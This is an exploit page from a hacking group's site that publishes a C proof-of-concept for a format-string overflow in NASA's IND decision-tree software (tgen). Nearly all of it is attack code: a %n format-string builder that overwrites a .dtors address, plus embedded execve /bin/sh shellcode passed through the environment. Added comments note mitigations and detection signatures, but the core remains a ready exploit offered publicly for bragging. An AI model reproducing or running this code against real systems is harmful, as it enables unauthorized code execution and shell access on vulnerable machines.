"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Exploits

NASA IND Tree Graph Format String Overflow


This is an example format string overflow for some GPL'd NASA software available.  This is utterly pointless (and we know that) but it's fun to ./g0vt

IND: Creation and Manipulation of Decision Trees from Data
A common approach to supervised classification and prediction in artificial intelligence and statistical pattern recognition is the use of decision trees. A tree is "grown" from data using a recursive partitioning algorithm to create a tree which (hopefully) has good prediction of classes on new data. Standard algorithms are 1) that of Breiman, Friedman, Olshen, and Stone; and 2) Id3 and its successor C4 (by Quinlan). As well as reimplementing parts of these algorithms and offering experimental control suites, IND also introduces Bayesian and MML methods and more sophisticated search in growing trees. These produce more accurate class probability estimates that are important in applications like diagnosis.


/*
 * POC for nasa software (eek!)
 * Tree Graph Datamining Algorithm
 * rbl4ck-nasa-IND-Tree.c
 * indulgences by redsand
 * public - cuz this is pointless
 * however i wanted to say i wrote an exploit
 * for US Government software
 * shoutz to darkeagle @ blacksec
 * 03/09/2006
 * redsand@blacksecurity.org
 *
 * software found at: (tgen)
 * http://opensource.arc.nasa.gov/project.jsp?id=7
 */


#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>


/* Split the 32-bit value 'addr' into its four bytes: b0 is the most
 * significant byte, b3 the least.  Function-like macro rather than a
 * static inline: 'addr' is evaluated four times, and the body is a bare
 * { } block rather than do { } while (0), so "doit(...);" before an
 * 'else' would not compile.  Both call sites on this page use it as a
 * plain statement. */
#define doit( b0, b1, b2, b3, addr )  { \
             b0 = (addr >> 24) & 0xff;  \
             b1 = (addr >> 16) & 0xff;  \
             b2 = (addr >>  8) & 0xff;  \
             b3 = (addr      ) & 0xff;  \
}



/* Fixed byte string that main() passes to the target as its only
 * environment entry.  It starts with a run of 0x41 bytes followed by the
 * payload proper; the page does not decode it and the bytes are left
 * untouched here.  Detection note: a constant sequence like this, carried
 * in argument or environment data, is straightforward to signature. */
char shellcode[] =
// shellcode by izik@tty64.org
// ids evading 0xcc trap h00k
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x6a\x30\x58\x6a\x05\x5b\xeb\x05\x59\xcd\x80"
    "\xcc\x40\xe8\xf6\xff\xff\xff\x99\xb0\x0b\x52"
    "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
    "\xe3\x52\x53\x54\xeb\xe1";


/* Build-time parameters.
 *   OFFSET    default positional index; main() lets argv[1] override it.
 *   TARGET    program that is exec'd; ARG2..ARG4 are its 2nd..4th arguments
 *             and include literal double-quote characters.
 *   DTORS     a target-binary-specific address that the page deliberately
 *             leaves for the reader to supply (see the author's note).
 *             NOTE(review): the expansion is unparenthesized ("X+4"), which is
 *             harmless in "locaddr = DTORS;" but a hazard in any other context.
 *   SHELLADDR unused: main() computes retaddr from a stack constant and the
 *             "retaddr = SHELLADDR;" line is commented out. */
#define OFFSET    20
#define TARGET "./tgen"
#define ARG2 "\"ttr,\""
#define ARG3 "\"A.enc,\""
#define ARG4 "\"A.treec\""
#define DTORS 0x08078008+4 // i'm not extracting dtors for you, u'll have to do that urself
// #define SHELLADDR    DTORS+0x14
#define SHELLADDR     0xdeadbeaf


//****************************************************************************************

/*
 * Build the positional-%n format string that main() hands to the target as
 * its first argument.  Returns a 999-byte, zero-filled heap buffer that the
 * caller owns; main() on this page never frees it (execle replaces the
 * process, so it only leaks if the exec fails).
 *
 *   retaddr  32-bit value split by doit() into b0..b3 (b0 most significant)
 *   offset   first positional argument index used in the "%<pos>$n"
 *            directives; the four directives use offset .. offset+3
 *   base     subtracted from the first field width only
 *   figure   subtracted from each byte before the widths are computed;
 *            it is a long, so the assignment wraps modulo 256
 *
 * Defender notes: "%n" makes the printf family write the number of
 * characters emitted so far through a pointer argument, which is what turns
 * an externally supplied format string into a memory write.  The target-side
 * mitigations are to never use argument data as a format (printf("%s", s)),
 * to build with -Wformat-security, and to use _FORTIFY_SOURCE=2, under which
 * glibc aborts on "%n" in a format string that lives in writable memory.  A
 * process argument containing "$n" conversions is a usable detection signature.
 */
char *
evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
  char * buf;
  unsigned char b0, b1, b2, b3;
  int start = 256;   /* padding added to every field width */

  doit( b0, b1, b2, b3, retaddr );
  buf = (char *)malloc(999);   /* NOTE(review): unchecked; memset/snprintf below dereference NULL on OOM */
  memset( buf, 0, 999 );

 b3 -= figure;
 b2 -= figure;
 b1 -= figure;
 b0 -= figure;

 /* Four "%<width>x%<pos>$n" pairs.  Each width is 'start' plus the
  * difference between consecutive adjusted bytes (the first one also minus
  * 16 and 'base'); the bytes are promoted to int, so the differences can be
  * negative and the string is always NUL-terminated within 999 bytes. */
 snprintf( buf, 999,
           "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
         b3 - 16 + start - base, offset,
             b2 - b3 + start, offset + 1,
             b1 - b2 + start, offset + 2,
             b0 - b1 + start, offset + 3 );

  return buf;
}



/*
 * Entry point.  Builds the argv[1] payload for TARGET and replaces this
 * process with it via execle(), passing 'shellcode' as the target's only
 * environment entry.  This program's own argv[1], if present, overrides
 * OFFSET (via atoi, unvalidated).  Always returns 0 when execle() fails.
 *
 * Defender notes: the return address is derived from a hard-coded
 * top-of-stack constant (0xbffffffa) and the injected bytes are located via
 * the environment, so the technique assumes a fixed, non-randomized and
 * executable stack; stack ASLR and a non-executable stack invalidate those
 * assumptions.  The target-side fix is to never pass argument data as a
 * printf-family format string.
 */
int
main( int argc, char * argv[] )
{
  char * fmt;                /* heap buffer from evil_builder(); never freed here */
  int i;                     /* unused */
  int off=OFFSET;
  char endian[31337];        /* argv[1] handed to the target */
  unsigned long locaddr, retaddr;
  unsigned int offset, base;
  unsigned char b0, b1, b2, b3;
  char * env[] = { shellcode, NULL };   /* the target's entire environment */


  memset( endian, 0x00, 31337 );


  if(argc > 1)
      off=atoi(argv[1]);     /* NOTE(review): no range check; non-numeric input yields 0 */

  locaddr = DTORS;
  retaddr = 0xbffffffa - strlen(shellcode) - strlen(TARGET);   /* guessed stack address; see header note */
  // retaddr = SHELLADDR;
  offset  = off; //  AAAA%19$x

  doit( b0, b1, b2, b3, locaddr );   /* locaddr bytes, b0 most significant */

  base = 4;
  printf("[*] Building evil code\n");
  strcpy(endian, "\xdd\xdd\xff\xbf");   /* fixed 4-byte prefix */
 
  /* Four copies of locaddr's bytes, least significant first, with the low
   * byte incremented by 0..3 per copy.  %c converts each int argument to
   * unsigned char, so b3 + 1..3 wrap at 256.  NOTE(review): the size argument
   * is sizeof(endian), not the space remaining after the prefix; it cannot
   * overflow here (20 bytes into 31337) but is the wrong bound in general. */
  snprintf( endian+strlen(endian), sizeof(endian),
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c"
            "%c%c%c%c",
             b3, b2, b1, b0,
             b3 + 1, b2, b1, b0,
             b3 + 2, b2, b1, b0,
             b3 + 3, b2, b1, b0 );
 

 
 fmt = evil_builder( retaddr, offset, base, 0x10 );
 strcat(endian, fmt);   /* unbounded, but fmt is at most 998 chars and endian has 31337 bytes */


 printf("[*] Using return address: 0x%08x with offset %d\n",retaddr, offset);   /* NOTE(review): retaddr is unsigned long; %08x expects unsigned int (should be %08lx) */
 printf("[*] Exploiting\n");
 execle(TARGET, TARGET, endian, ARG2, ARG3, ARG4, NULL, env);   /* NOTE(review): return value unchecked; on failure execution falls through and exits 0 */

 return 0;
}


NASA IND Tree Graph Format String Overflow